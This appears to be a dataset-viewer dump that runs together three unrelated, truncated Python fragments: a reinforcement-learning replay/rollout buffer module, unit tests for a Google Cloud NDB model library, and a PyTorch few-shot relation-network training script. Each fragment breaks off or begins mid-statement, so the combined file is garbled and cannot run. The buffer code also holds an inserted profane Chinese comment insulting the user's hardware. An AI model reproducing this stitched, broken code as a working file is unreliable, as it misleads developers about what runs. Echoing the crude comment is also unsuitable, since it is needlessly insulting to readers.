input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
import warnings
from abc import ABC, abstractmethod
from typing import Dict, Generator, Optional, Union
import numpy as np
import torch as th
from gym import spaces
try:
# Check memory used by replay buffer when possible
import psutil
except ImportError:
psutil = None
from stable_baselines3.common.preprocessing import get_action_dim, get_obs_shape
from stable_baselines3.common.type_aliases import ReplayBufferSamples, RolloutBufferSamples
from stable_baselines3.common.vec_env import VecNormalize
class BaseBuffer(ABC):
"""
Base class that represent a buffer (rollout or replay)
:param buffer_size: Max number of element in the buffer
:param observation_space: Observation space
:param action_space: Action space
:param device: PyTorch device
to which the values will be converted
:param n_envs: Number of parallel environments
"""
def __init__(
self,
buffer_size: int,
observation_space: spaces.Space,
action_space: spaces.Space,
device: Union[th.device, str] = "cpu",
n_envs: int = 1,
):
super(BaseBuffer, self).__init__()
self.buffer_size = buffer_size
self.observation_space = observation_space
self.action_space = action_space
self.obs_shape = get_obs_shape(observation_space)
self.action_dim = get_action_dim(action_space)
self.pos = 0
self.full = False
self.device = device
self.n_envs = n_envs
@staticmethod
def swap_and_flatten(arr: np.ndarray) -> np.ndarray:
"""
Swap and then flatten axes 0 (buffer_size) and 1 (n_envs)
to convert shape from [n_steps, n_envs, ...] (when ... is the shape of the features)
to [n_steps * n_envs, ...] (which maintain the order)
:param arr:
:return:
"""
shape = arr.shape
if len(shape) < 3:
shape = shape + (1,)
return arr.swapaxes(0, 1).reshape(shape[0] * shape[1], *shape[2:])
def size(self) -> int:
"""
:return: The current size of the buffer
"""
if self.full:
return self.buffer_size
return self.pos
def add(self, *args, **kwargs) -> None:
"""
Add elements to the buffer.
"""
raise NotImplementedError()
def extend(self, *args, **kwargs) -> None:
"""
Add a new batch of transitions to the buffer
"""
# Do a for loop along the batch axis
for data in zip(*args):
self.add(*data)
def reset(self) -> None:
"""
Reset the buffer.
"""
self.pos = 0
self.full = False
def sample(self, batch_size: int, env: Optional[VecNormalize] = None):
"""
:param batch_size: Number of element to sample
:param env: associated gym VecEnv
to normalize the observations/rewards when sampling
:return:
"""
upper_bound = self.buffer_size if self.full else self.pos
batch_inds = np.random.randint(0, upper_bound, size=batch_size)
return self._get_samples(batch_inds, env=env)
@abstractmethod
def _get_samples(
self, batch_inds: np.ndarray, env: Optional[VecNormalize] = None
) -> Union[ReplayBufferSamples, RolloutBufferSamples]:
"""
:param batch_inds:
:param env:
:return:
"""
raise NotImplementedError()
def to_torch(self, array: np.ndarray, copy: bool = True) -> th.Tensor:
"""
Convert a numpy array to a PyTorch tensor.
Note: it copies the data by default
:param array:
:param copy: Whether to copy or not the data
(may be useful to avoid changing things be reference)
:return:
"""
if copy:
return th.tensor(array).to(self.device)
return th.as_tensor(array).to(self.device)
@staticmethod
def _normalize_obs(
obs: Union[np.ndarray, Dict[str, np.ndarray]], env: Optional[VecNormalize] = None
) -> Union[np.ndarray, Dict[str, np.ndarray]]:
if env is not None:
return env.normalize_obs(obs)
return obs
@staticmethod
def _normalize_reward(reward: np.ndarray, env: Optional[VecNormalize] = None) -> np.ndarray:
if env is not None:
return env.normalize_reward(reward).astype(np.float32)
return reward
class ReplayBuffer(BaseBuffer):
"""
Replay buffer used in off-policy algorithms like SAC/TD3.
:param buffer_size: Max number of element in the buffer
:param observation_space: Observation space
:param action_space: Action space
:param device:
:param n_envs: Number of parallel environments
:param optimize_memory_usage: Enable a memory efficient variant
of the replay buffer which reduces by almost a factor two the memory used,
at a cost of more complexity.
See https://github.com/DLR-RM/stable-baselines3/issues/37#issuecomment-637501195
and https://github.com/DLR-RM/stable-baselines3/pull/28#issuecomment-637559274
"""
def __init__(
self,
buffer_size: int,
observation_space: spaces.Space,
action_space: spaces.Space,
device: Union[th.device, str] = "cpu",
n_envs: int = 1,
optimize_memory_usage: bool = False,
):
super(ReplayBuffer, self).__init__(buffer_size, observation_space, action_space, device, n_envs=n_envs)
assert n_envs == 1, "Replay buffer only support single environment for now"
# Check that the replay buffer can fit into the memory
if psutil is not None:
mem_available = psutil.virtual_memory().available
self.optimize_memory_usage = optimize_memory_usage
self.observations = np.zeros((self.buffer_size, self.n_envs) + self.obs_shape, dtype=observation_space.dtype)
if optimize_memory_usage:
# `observations` contains also the next observation
self.next_observations = None
else:
self.next_observations = np.zeros((self.buffer_size, self.n_envs) + self.obs_shape, dtype=observation_space.dtype)
self.actions = np.zeros((self.buffer_size, self.n_envs, self.action_dim), dtype=action_space.dtype)
self.rewards = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.dones = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
if psutil is not None:
total_memory_usage = self.observations.nbytes + self.actions.nbytes + self.rewards.nbytes + self.dones.nbytes
if self.next_observations is not None:
total_memory_usage += self.next_observations.nbytes
if total_memory_usage > mem_available:
# Convert to GB
total_memory_usage /= 1e9
mem_available /= 1e9
warnings.warn(
"This system does not have apparently enough memory to store the complete "
f"replay buffer {total_memory_usage:.2f}GB > {mem_available:.2f}GB"
)
def add(self, obs: np.ndarray, next_obs: np.ndarray, action: np.ndarray, reward: np.ndarray, done: np.ndarray) -> None:
# Copy to avoid modification by reference
self.observations[self.pos] = np.array(obs).copy()
if self.optimize_memory_usage:
self.observations[(self.pos + 1) % self.buffer_size] = np.array(next_obs).copy()
else:
self.next_observations[self.pos] = np.array(next_obs).copy()
self.actions[self.pos] = np.array(action).copy()
self.rewards[self.pos] = np.array(reward).copy()
self.dones[self.pos] = np.array(done).copy()
self.pos += 1
if self.pos == self.buffer_size:
self.full = True
self.pos = 0
def sample(self, batch_size: int, env: Optional[VecNormalize] = None) -> ReplayBufferSamples:
"""
Sample elements from the replay buffer.
Custom sampling when using memory efficient variant,
as we should not sample the element with index `self.pos`
See https://github.com/DLR-RM/stable-baselines3/pull/28#issuecomment-637559274
:param batch_size: Number of element to sample
:param env: associated gym VecEnv
to normalize the observations/rewards when sampling
:return:
"""
if not self.optimize_memory_usage:
return super().sample(batch_size=batch_size, env=env)
# Do not sample the element with index `self.pos` as the transitions is invalid
# (we use only one array to store `obs` and `next_obs`) 傻逼玩意连内存买不起?
if self.full:
batch_inds = (np.random.randint(1, self.buffer_size, size=batch_size) + self.pos) % self.buffer_size
else:
batch_inds = np.random.randint(0, self.pos, size=batch_size)
return self._get_samples(batch_inds, env=env)
def _get_samples(self, batch_inds: np.ndarray, env: Optional[VecNormalize] = None) -> ReplayBufferSamples:
if self.optimize_memory_usage:
next_obs = self._normalize_obs(self.observations[(batch_inds + 1) % self.buffer_size, 0, :], env)
else:
next_obs = self._normalize_obs(self.next_observations[batch_inds, 0, :], env)
data = (
self._normalize_obs(self.observations[batch_inds, 0, :], env),
self.actions[batch_inds, 0, :],
next_obs,
self.dones[batch_inds],
self._normalize_reward(self.rewards[batch_inds], env),
)
return ReplayBufferSamples(*tuple(map(self.to_torch, data)))
class RolloutBuffer(BaseBuffer):
"""
Rollout buffer used in on-policy algorithms like A2C/PPO.
It corresponds to ``buffer_size`` transitions collected
using the current policy.
This experience will be discarded after the policy update.
In order to use PPO objective, we also store the current value of each state
and the log probability of each taken action.
使用完就弃用
The term rollout here refers to the model-free notion and should not
be used with the concept of rollout used in model-based RL or planning.
Hence, it is only involved in policy and value function training but not action selection.
:param buffer_size: Max number of element in the buffer
:param observation_space: Observation space
:param action_space: Action space
:param device:
:param gae_lambda: Factor for trade-off of bias vs variance for Generalized Advantage Estimator
Equivalent to classic advantage when set to 1.
:param gamma: Discount factor
:param n_envs: Number of parallel environments
"""
def __init__(
self,
buffer_size: int,
observation_space: spaces.Space,
action_space: spaces.Space,
device: Union[th.device, str] = "cpu",
gae_lambda: float = 1,
gamma: float = 0.99,
n_envs: int = 1,
):
super(RolloutBuffer, self).__init__(buffer_size, observation_space, action_space, device, n_envs=n_envs)
self.gae_lambda = gae_lambda
self.gamma = gamma
self.observations, self.actions, self.rewards, self.advantages = None, None, None, None
self.returns, self.episode_starts, self.values, self.log_probs = None, None, None, None
self.generator_ready = False
self.reset()
def reset(self) -> None:
self.observations = np.zeros((self.buffer_size, self.n_envs) + self.obs_shape, dtype=np.float32)
self.actions = np.zeros((self.buffer_size, self.n_envs, self.action_dim), dtype=np.float32)
self.rewards = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.returns = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.episode_starts = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.values = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.log_probs = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.advantages = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.generator_ready = False
super(RolloutBuffer, self).reset()
def compute_returns_and_advantage(self, last_values: th.Tensor, dones: np.ndarray) -> None:
"""
Post-processing step: compute the lambda-return (TD(lambda) estimate)
and GAE(lambda) advantage.
Uses Generalized Advantage Estimation (https://arxiv.org/abs/1506.02438)
to compute the advantage. To obtain vanilla advantage (A(s) = R - V(S))
where R is the discounted reward with value bootstrap,
set ``gae_lambda=1.0`` during initialization.
The TD(lambda) estimator has also two special cases:
- TD(1) is Monte-Carlo estimate (sum of discounted rewards)
- TD(0) is one-step estimate with bootstrapping (r_t + gamma * v(s_{t+1}))
For more information, see discussion in https://github.com/DLR-RM/stable-baselines3/pull/375.
:param last_values: state value estimation for the last step (one for each env)
:param dones: if the last step was a terminal step (one bool for each env).
"""
# Convert to numpy
last_values = last_values.clone().cpu().numpy().flatten()
last_gae_lam = 0
for step in reversed(range(self.buffer_size)):
if step | |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import pickle
import types
import unittest.mock
import zlib
from google.cloud.datastore import helpers
import pytest
from google.cloud.ndb import _datastore_types
from google.cloud.ndb import exceptions
from google.cloud.ndb import key
from google.cloud.ndb import model
from google.cloud.ndb import query
import tests.unit.utils
def test___all__():
tests.unit.utils.verify___all__(model)
def test_Key():
assert model.Key is key.Key
def test_BlobKey():
assert model.BlobKey is _datastore_types.BlobKey
def test_GeoPt():
assert model.GeoPt is helpers.GeoPoint
class TestIndexProperty:
@staticmethod
def test_constructor():
index_prop = model.IndexProperty(name="a", direction="asc")
assert index_prop._name == "a"
assert index_prop._direction == "asc"
@staticmethod
def test_name():
index_prop = model.IndexProperty(name="b", direction="asc")
assert index_prop.name == "b"
@staticmethod
def test_direction():
index_prop = model.IndexProperty(name="a", direction="desc")
assert index_prop.direction == "desc"
@staticmethod
def test___repr__():
index_prop = model.IndexProperty(name="c", direction="asc")
assert repr(index_prop) == "IndexProperty(name='c', direction='asc')"
@staticmethod
def test___eq__():
index_prop1 = model.IndexProperty(name="d", direction="asc")
index_prop2 = model.IndexProperty(name="d", direction="desc")
index_prop3 = unittest.mock.sentinel.index_prop
assert index_prop1 == index_prop1
assert not index_prop1 == index_prop2
assert not index_prop1 == index_prop3
@staticmethod
def test___ne__():
index_prop1 = model.IndexProperty(name="d", direction="asc")
index_prop2 = model.IndexProperty(name="d", direction="desc")
index_prop3 = unittest.mock.sentinel.index_prop
assert not index_prop1 != index_prop1
assert index_prop1 != index_prop2
assert index_prop1 != index_prop3
@staticmethod
def test___hash__():
index_prop1 = model.IndexProperty(name="zip", direction="asc")
index_prop2 = model.IndexProperty(name="zip", direction="asc")
assert index_prop1 is not index_prop2
assert hash(index_prop1) == hash(index_prop2)
assert hash(index_prop1) == hash(("zip", "asc"))
class TestIndex:
@staticmethod
def test_constructor():
index_prop = model.IndexProperty(name="a", direction="asc")
index = model.Index(
kind="IndK", properties=(index_prop,), ancestor=False
)
assert index._kind == "IndK"
assert index._properties == (index_prop,)
assert not index._ancestor
@staticmethod
def test_kind():
index = model.Index(kind="OK", properties=(), ancestor=False)
assert index.kind == "OK"
@staticmethod
def test_properties():
index_prop1 = model.IndexProperty(name="a", direction="asc")
index_prop2 = model.IndexProperty(name="b", direction="desc")
index = model.Index(
kind="F", properties=(index_prop1, index_prop2), ancestor=False
)
assert index.properties == (index_prop1, index_prop2)
@staticmethod
def test_ancestor():
index = model.Index(kind="LK", properties=(), ancestor=True)
assert index.ancestor
@staticmethod
def test___repr__():
index_prop = model.IndexProperty(name="a", direction="asc")
index = model.Index(
kind="IndK", properties=[index_prop], ancestor=False
)
expected = "Index(kind='IndK', properties=[{!r}], ancestor=False)"
expected = expected.format(index_prop)
assert repr(index) == expected
@staticmethod
def test___eq__():
index_props = (model.IndexProperty(name="a", direction="asc"),)
index1 = model.Index(kind="d", properties=index_props, ancestor=False)
index2 = model.Index(kind="d", properties=(), ancestor=False)
index3 = model.Index(kind="d", properties=index_props, ancestor=True)
index4 = model.Index(kind="e", properties=index_props, ancestor=False)
index5 = unittest.mock.sentinel.index
assert index1 == index1
assert not index1 == index2
assert not index1 == index3
assert not index1 == index4
assert not index1 == index5
@staticmethod
def test___ne__():
index_props = (model.IndexProperty(name="a", direction="asc"),)
index1 = model.Index(kind="d", properties=index_props, ancestor=False)
index2 = model.Index(kind="d", properties=(), ancestor=False)
index3 = model.Index(kind="d", properties=index_props, ancestor=True)
index4 = model.Index(kind="e", properties=index_props, ancestor=False)
index5 = unittest.mock.sentinel.index
assert not index1 != index1
assert index1 != index2
assert index1 != index3
assert index1 != index4
assert index1 != index5
@staticmethod
def test___hash__():
index_props = (model.IndexProperty(name="a", direction="asc"),)
index1 = model.Index(kind="d", properties=index_props, ancestor=False)
index2 = model.Index(kind="d", properties=index_props, ancestor=False)
assert index1 is not index2
assert hash(index1) == hash(index2)
assert hash(index1) == hash(("d", index_props, False))
class TestIndexState:
INDEX = unittest.mock.sentinel.index
def test_constructor(self):
index_state = model.IndexState(
definition=self.INDEX, state="error", id=42
)
assert index_state._definition is self.INDEX
assert index_state._state == "error"
assert index_state._id == 42
def test_definition(self):
index_state = model.IndexState(
definition=self.INDEX, state="serving", id=1
)
assert index_state.definition is self.INDEX
@staticmethod
def test_state():
index_state = model.IndexState(definition=None, state="deleting", id=1)
assert index_state.state == "deleting"
@staticmethod
def test_id():
index_state = model.IndexState(definition=None, state="error", id=1001)
assert index_state.id == 1001
@staticmethod
def test___repr__():
index_prop = model.IndexProperty(name="a", direction="asc")
index = model.Index(
kind="IndK", properties=[index_prop], ancestor=False
)
index_state = model.IndexState(
definition=index, state="building", id=1337
)
expected = (
"IndexState(definition=Index(kind='IndK', properties=["
"IndexProperty(name='a', direction='asc')], ancestor=False), "
"state='building', id=1337)"
)
assert repr(index_state) == expected
def test___eq__(self):
index_state1 = model.IndexState(
definition=self.INDEX, state="error", id=20
)
index_state2 = model.IndexState(
definition=unittest.mock.sentinel.not_index, state="error", id=20
)
index_state3 = model.IndexState(
definition=self.INDEX, state="serving", id=20
)
index_state4 = model.IndexState(
definition=self.INDEX, state="error", id=80
)
index_state5 = unittest.mock.sentinel.index_state
assert index_state1 == index_state1
assert not index_state1 == index_state2
assert not index_state1 == index_state3
assert not index_state1 == index_state4
assert not index_state1 == index_state5
def test___ne__(self):
index_state1 = model.IndexState(
definition=self.INDEX, state="error", id=20
)
index_state2 = model.IndexState(
definition=unittest.mock.sentinel.not_index, state="error", id=20
)
index_state3 = model.IndexState(
definition=self.INDEX, state="serving", id=20
)
index_state4 = model.IndexState(
definition=self.INDEX, state="error", id=80
)
index_state5 = unittest.mock.sentinel.index_state
assert not index_state1 != index_state1
assert index_state1 != index_state2
assert index_state1 != index_state3
assert index_state1 != index_state4
assert index_state1 != index_state5
def test___hash__(self):
index_state1 = model.IndexState(
definition=self.INDEX, state="error", id=88
)
index_state2 = model.IndexState(
definition=self.INDEX, state="error", id=88
)
assert index_state1 is not index_state2
assert hash(index_state1) == hash(index_state2)
assert hash(index_state1) == hash((self.INDEX, "error", 88))
class TestModelAdapter:
@staticmethod
def test_constructor():
with pytest.raises(NotImplementedError):
model.ModelAdapter()
def test_make_connection():
with pytest.raises(NotImplementedError):
model.make_connection()
class TestModelAttribute:
@staticmethod
def test_constructor():
attr = model.ModelAttribute()
assert isinstance(attr, model.ModelAttribute)
@staticmethod
def test__fix_up():
attr = model.ModelAttribute()
assert attr._fix_up(model.Model, "birthdate") is None
class Test_BaseValue:
@staticmethod
def test_constructor():
wrapped = model._BaseValue(17)
assert wrapped.b_val == 17
@staticmethod
def test_constructor_invalid_input():
with pytest.raises(TypeError):
model._BaseValue(None)
with pytest.raises(TypeError):
model._BaseValue([1, 2])
@staticmethod
def test___repr__():
wrapped = model._BaseValue(b"abc")
assert repr(wrapped) == "_BaseValue(b'abc')"
@staticmethod
def test___eq__():
wrapped1 = model._BaseValue("one val")
wrapped2 = model._BaseValue(25.5)
wrapped3 = unittest.mock.sentinel.base_value
assert wrapped1 == wrapped1
assert not wrapped1 == wrapped2
assert not wrapped1 == wrapped3
@staticmethod
def test___ne__():
wrapped1 = model._BaseValue("one val")
wrapped2 = model._BaseValue(25.5)
wrapped3 = unittest.mock.sentinel.base_value
assert not wrapped1 != wrapped1
assert wrapped1 != wrapped2
assert wrapped1 != wrapped3
@staticmethod
def test___hash__():
wrapped = model._BaseValue((11, 12, 88))
with pytest.raises(TypeError):
hash(wrapped)
class TestProperty:
@staticmethod
def test_constructor_defaults():
prop = model.Property()
# Check that none of the constructor defaults were used.
assert prop.__dict__ == {}
@staticmethod
def _example_validator(prop, value):
return value.lower()
def test__example_validator(self):
value = "AbCde"
validated = self._example_validator(None, value)
assert validated == "abcde"
assert self._example_validator(None, validated) == "abcde"
def test_constructor_explicit(self):
prop = model.Property(
name="val",
indexed=False,
repeated=False,
required=True,
default="zorp",
choices=("zorp", "zap", "zip"),
validator=self._example_validator,
verbose_name="VALUE FOR READING",
write_empty_list=False,
)
assert prop._name == "val"
assert not prop._indexed
assert not prop._repeated
assert prop._required
assert prop._default == "zorp"
assert prop._choices == frozenset(("zorp", "zap", "zip"))
assert prop._validator is self._example_validator
assert prop._verbose_name == "VALUE FOR READING"
assert not prop._write_empty_list
@staticmethod
def test_constructor_invalid_name():
with pytest.raises(TypeError):
model.Property(name=["not", "a", "string"])
with pytest.raises(ValueError):
model.Property(name="has.a.dot")
@staticmethod
def test_constructor_repeated_not_allowed():
with pytest.raises(ValueError):
model.Property(name="a", repeated=True, required=True)
with pytest.raises(ValueError):
model.Property(name="b", repeated=True, default="zim")
@staticmethod
def test_constructor_invalid_choices():
with pytest.raises(TypeError):
model.Property(name="a", choices={"wrong": "container"})
@staticmethod
def test_constructor_invalid_validator():
with pytest.raises(TypeError):
model.Property(
name="a", validator=unittest.mock.sentinel.validator
)
def test_repr(self):
prop = model.Property(
"val",
indexed=False,
repeated=False,
required=True,
default="zorp",
choices=("zorp", "zap", "zip"),
validator=self._example_validator,
verbose_name="VALUE FOR READING",
write_empty_list=False,
)
expected = (
"Property('val', indexed=False, required=True, "
"default='zorp', choices={}, validator={}, "
"verbose_name='VALUE FOR READING')".format(
prop._choices, prop._validator
)
)
assert repr(prop) == expected
@staticmethod
def test_repr_subclass():
class SimpleProperty(model.Property):
_foo_type = None
_bar = "eleventy"
def __init__(self, *, foo_type, bar):
self._foo_type = foo_type
self._bar = bar
prop = SimpleProperty(foo_type=list, bar="nope")
assert repr(prop) == "SimpleProperty(foo_type=list, bar='nope')"
@staticmethod
def test__datastore_type():
prop = model.Property("foo")
value = unittest.mock.sentinel.value
assert prop._datastore_type(value) is value
@staticmethod
def test__comparison_indexed():
prop = model.Property("color", indexed=False)
with pytest.raises(exceptions.BadFilterError):
prop._comparison("!=", "red")
@staticmethod
def test__comparison(property_clean_cache):
prop = model.Property("sentiment", indexed=True)
filter_node = prop._comparison(">=", 0.0)
assert filter_node == query.FilterNode("sentiment", ">=", 0.0)
@staticmethod
def test__comparison_empty_value():
prop = model.Property("height", indexed=True)
filter_node = prop._comparison("=", None)
assert filter_node == query.FilterNode("height", "=", None)
# Cache is untouched.
assert model.Property._FIND_METHODS_CACHE == {}
@staticmethod
def test___eq__(property_clean_cache):
prop = model.Property("name", indexed=True)
value = 1337
expected = query.FilterNode("name", "=", value)
filter_node_left = prop == value
assert filter_node_left == expected
filter_node_right = value == prop
assert filter_node_right == expected
@staticmethod
def test___ne__(property_clean_cache):
prop = model.Property("name", indexed=True)
value = 7.0
expected = query.DisjunctionNode(
query.FilterNode("name", "<", value),
query.FilterNode("name", ">", value),
)
or_node_left = prop != value
assert or_node_left == expected
or_node_right = value != prop
assert or_node_right == expected
@staticmethod
def test___lt__(property_clean_cache):
prop = model.Property("name", indexed=True)
value = 2.0
expected = query.FilterNode("name", "<", value)
filter_node_left = prop < value
assert filter_node_left == expected
filter_node_right = value > prop
assert filter_node_right == expected
@staticmethod
def test___le__(property_clean_cache):
prop = model.Property("name", indexed=True)
value = 20.0
expected = query.FilterNode("name", "<=", value)
filter_node_left = prop <= value
assert filter_node_left == expected
filter_node_right = value >= prop
assert filter_node_right == expected
@staticmethod
def test___gt__(property_clean_cache):
prop = model.Property("name", indexed=True)
| |
= torch.relu(self.fc1(out))
out = torch.sigmoid(self.fc2(out))
return out, {"x": x, "out1": out1, "out2": out2} if is_summary else None
pass
class CNNEncoderMy4(nn.Module):
def __init__(self):
super().__init__()
self.layer1 = nn.Sequential(nn.Conv2d(3, 16, kernel_size=3, padding=0),
nn.BatchNorm2d(16, momentum=1, affine=True), nn.ReLU(), nn.MaxPool2d(2))
self.layer2 = nn.Sequential(nn.Conv2d(16, 16, kernel_size=3, padding=0, dilation=1),
nn.BatchNorm2d(16, momentum=1, affine=True), nn.ReLU())
self.layer3 = nn.Sequential(nn.Conv2d(16, 32, kernel_size=3, padding=0, dilation=2),
nn.BatchNorm2d(32, momentum=1, affine=True), nn.ReLU())
self.layer4 = nn.Sequential(nn.Conv2d(32, 32, kernel_size=3, padding=0, dilation=3),
nn.BatchNorm2d(32, momentum=1, affine=True), nn.ReLU())
pass
def forward(self, x, is_summary=False):
out1 = self.layer1(x)
out2 = self.layer2(out1)
out3 = self.layer3(out2)
out4 = self.layer4(out3)
return out4, {"x": x, "out1": out1, "out2": out2, "out3": out3, "out4": out4} if is_summary else None
pass
class RelationNetworkMy4(nn.Module):
def __init__(self):
super().__init__()
self.layer1 = nn.Sequential(nn.Conv2d(64, 32, kernel_size=3, padding=1),
nn.BatchNorm2d(32, momentum=1, affine=True), nn.ReLU(), nn.MaxPool2d(2))
self.layer2 = nn.Sequential(nn.Conv2d(32, 32, kernel_size=3, padding=1),
nn.BatchNorm2d(32, momentum=1, affine=True), nn.ReLU(), nn.MaxPool2d(2))
self.layer3 = nn.Sequential(nn.Conv2d(32, 32, kernel_size=3, padding=1),
nn.BatchNorm2d(32, momentum=1, affine=True), nn.ReLU(), nn.AdaptiveAvgPool2d(4))
self.fc1 = nn.Linear(32 * 4 * 4, 32)
self.fc2 = nn.Linear(32, 1)
pass
def forward(self, x, is_summary=False):
out1 = self.layer1(x)
out2 = self.layer2(out1)
out3 = self.layer3(out2)
out = out3.view(out3.size(0), -1)
out = torch.relu(self.fc1(out))
out = torch.sigmoid(self.fc2(out))
return out, {"x": x, "out1": out1, "out2": out2} if is_summary else None
pass
##############################################################################################################
class Runner(object):
def __init__(self, model_name, feature_encoder, relation_network, compare_fsl_fn, train_episode=300000,
data_root='/mnt/4T/Data/miniImagenet', summary_dir=None, is_load_data=False):
self.class_num = 5
self.sample_num_per_class = 1
self.batch_num_per_class = 15
self.train_episode = train_episode # 500000
self.val_episode = 600
self.test_avg_num = 10
self.test_episode = 600
self.learning_rate = 0.001
self.print_freq = 1000
self.val_freq = 5000 # 5000
self.best_accuracy = 0.0
self.model_name = model_name
self.feature_encoder = feature_encoder
self.relation_network = relation_network
self.compare_fsl_fn = compare_fsl_fn
self.feature_encoder_dir = Tools.new_dir("../models/{}_feature_encoder_{}way_{}shot.pkl".format(
self.model_name, self.class_num, self.sample_num_per_class))
self.relation_network_dir = Tools.new_dir("../models/{}_relation_network_{}way_{}shot.pkl".format(
self.model_name, self.class_num, self.sample_num_per_class))
# data
self.folders_train, self.folders_val, self.folders_test = MiniImageNet.folders(data_root)
self.data_dict = MiniImageNet.load_data(self.folders_train, self.folders_val,
self.folders_test) if is_load_data else None
# model
self.feature_encoder.apply(self._weights_init).cuda()
self.relation_network.apply(self._weights_init).cuda()
self.feature_encoder_optim = torch.optim.Adam(self.feature_encoder.parameters(), lr=self.learning_rate)
self.feature_encoder_scheduler = StepLR(self.feature_encoder_optim, self.train_episode//3, gamma=0.5)
self.relation_network_optim = torch.optim.Adam(self.relation_network.parameters(), lr=self.learning_rate)
self.relation_network_scheduler = StepLR(self.relation_network_optim, self.train_episode//3, gamma=0.5)
self.loss = self._loss()
self.summary_dir = summary_dir
self.is_summary = self.summary_dir is not None
self.writer = None
pass
@staticmethod
def _weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif classname.find('BatchNorm') != -1:
m.weight.data.fill_(1)
m.bias.data.zero_()
elif classname.find('Linear') != -1:
m.weight.data.normal_(0, 0.01)
m.bias.data = torch.ones(m.bias.data.size())
pass
pass
@staticmethod
def _loss():
mse = nn.MSELoss().cuda()
return mse
def load_model(self):
if os.path.exists(self.feature_encoder_dir):
self.feature_encoder.load_state_dict(torch.load(self.feature_encoder_dir))
Tools.print("load feature encoder success from {}".format(self.feature_encoder_dir))
if os.path.exists(self.relation_network_dir):
self.relation_network.load_state_dict(torch.load(self.relation_network_dir))
Tools.print("load relation network success from {}".format(self.relation_network_dir))
pass
def _feature_vision(self, other_sample_features,
other_batch_features, other_relation_features, episode, is_vision=False):
if self.is_summary and (episode % 20000 == 0 or is_vision):
if self.writer is None:
self.writer = SummaryWriter(self.summary_dir)
pass
feature_root_name = "Train" if episode >= 0 else "Val"
# 特征可视化
for other_features, name in [[other_sample_features, "Sample"],
[other_batch_features, "Batch"],
[other_relation_features, "Relation"]]:
for key in other_features:
if other_features[key].size(1) == 3: # 原图
one_features = vutils.make_grid(other_features[key], normalize=True,
scale_each=True, nrow=self.batch_num_per_class)
self.writer.add_image('{}-{}-{}'.format(feature_root_name, name, key), one_features, episode)
pass
else: # 特征
key_features = torch.split(other_features[key], split_size_or_sections=1, dim=1)
for index, feature_one in enumerate(key_features):
one_features = vutils.make_grid(feature_one, normalize=True,
scale_each=True, nrow=self.batch_num_per_class)
self.writer.add_image('{}-{}-{}/{}'.format(feature_root_name, name,
key, index), one_features, episode)
pass
pass
pass
pass
# 参数可视化
for name, param in self.feature_encoder.named_parameters():
self.writer.add_histogram(name, param.clone().cpu().data.numpy(), episode)
pass
for name, param in self.relation_network.named_parameters():
self.writer.add_histogram(name, param.clone().cpu().data.numpy(), episode)
pass
pass
pass
# Original 1
def compare_fsl_1(self, samples, batches):
# calculate features
sample_features, other_sample_features = self.feature_encoder(samples.cuda(), self.is_summary) # 5x64*19*19
batch_features, other_batch_features = self.feature_encoder(batches.cuda(), self.is_summary) # 75x64*19*19
batch_size, feature_dim, feature_width, feature_height = batch_features.shape
# calculate relations
sample_features_ext = sample_features.unsqueeze(0).repeat(batch_size, 1, 1, 1, 1)
batch_features_ext = batch_features.unsqueeze(0).repeat(
self.sample_num_per_class * self.class_num, 1, 1, 1, 1)
batch_features_ext = torch.transpose(batch_features_ext, 0, 1)
relation_pairs = torch.cat((sample_features_ext, batch_features_ext),
2).view(-1, feature_dim * 2, feature_width, feature_height)
relations, other_relation_features = self.relation_network(relation_pairs, self.is_summary)
relations = relations.view(-1, self.class_num * self.sample_num_per_class)
return relations, other_sample_features, other_batch_features, other_relation_features
# Original 2
def compare_fsl_2(self, samples, batches):
# features
sample_features, other_sample_features = self.feature_encoder(samples.cuda(), self.is_summary) # 5x64*19*19
batch_features, other_batch_features = self.feature_encoder(batches.cuda(), self.is_summary) # 75x64*19*19
# size
sample_batch_size, feature_channel, feature_width, feature_height = sample_features.shape
batch_batch_size = batch_features.shape[0]
wxh = feature_width * feature_height
# 配对
sample_features_ext = sample_features.unsqueeze(0).repeat(batch_batch_size, 1, 1, 1, 1)
batch_features_ext = batch_features.unsqueeze(0).repeat(self.sample_num_per_class * self.class_num, 1, 1, 1, 1)
batch_features_ext = torch.transpose(batch_features_ext, 0, 1)
# 变换形状
sample_features_ext = sample_features_ext.view(batch_batch_size, sample_batch_size, feature_channel, -1)
sample_features_ext = sample_features_ext.view(-1, feature_channel, sample_features_ext.shape[-1])
batch_features_ext = batch_features_ext.view(batch_batch_size, sample_batch_size, feature_channel, -1)
batch_features_ext = batch_features_ext.reshape(-1, feature_channel, batch_features_ext.shape[-1])
# 准备两两特征
sample_features_ext = sample_features_ext.unsqueeze(2).repeat(1, 1, wxh, 1)
batch_features_ext = torch.transpose(batch_features_ext.unsqueeze(2).repeat(1, 1, wxh, 1), 2, 3)
# 求余弦相似度
relation_pairs = torch.cosine_similarity(sample_features_ext, batch_features_ext, dim=1)
relation_pairs = relation_pairs.view(-1, wxh * wxh)
# 计算关系得分
relations, other_relation_features = self.relation_network(relation_pairs, self.is_summary)
relations = relations.view(-1, self.class_num * self.sample_num_per_class)
return relations, other_sample_features, other_batch_features, other_relation_features
# Original 2
def compare_fsl_3(self, samples, batches):
# features
sample_features, other_sample_features = self.feature_encoder(samples.cuda(), self.is_summary) # 5x64*19*19
batch_features, other_batch_features = self.feature_encoder(batches.cuda(), self.is_summary) # 75x64*19*19
# size
